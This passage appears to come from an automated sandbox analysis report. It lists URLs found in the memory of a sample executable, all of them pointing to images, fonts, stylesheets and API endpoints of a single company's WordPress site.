                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-300x100.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-50x17.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-768x256.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_02_AUF-EINEN-BLICK-1024x342.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_02_AUF-EINEN-BLICK-150x50.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_02_AUF-EINEN-BLICK-260x87.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_02_AUF-EINEN-BLICK-300x100.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_02_AUF-EINEN-BLICK-50x17.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_02_AUF-EINEN-BLICK-768x256.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_02_AUF-EINEN-BLICK.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2022/08/S30BW-9e22082315160.pdf
                      Source: iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/betheme/css/post-641.css?ver=1678431279
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/betheme/css/post-641.css?ver=1678431351
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/lato-v23-latin-300.eot
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/lato-v23-latin-300.eot?#iefix
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/lato-v23-latin-300.svg#Lato
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/lato-v23-latin-300.ttf
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/lato-v23-latin-300.woff
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/lato-v23-latin-300.woff2
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/lato-v23-latin-regular.eot
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/lato-v23-latin-regular.eot?#iefix
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/lato-v23-latin-regular.svg#Lato
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/lato-v23-latin-regular.ttf
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/lato-v23-latin-regular.woff
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/lato-v23-latin-regular.woff2
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.473713643.0000000005150000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.478763378.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/open-sans-v34-latin_cyrillic-regular.ttf
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/roboto-v30-latin-regular.eot
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/roboto-v30-latin-regular.eot?#iefix
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/roboto-v30-latin-regular.svg#Roboto
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/roboto-v30-latin-regular.ttf
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/roboto-v30-latin-regular.woff
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/roboto-v30-latin-regular.woff2
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.473713643.0000000005150000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.478763378.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/upoads/fonts/open-sans-v34-latin_cyrillic-regular.woff
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-json/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.com-sit.com%2F
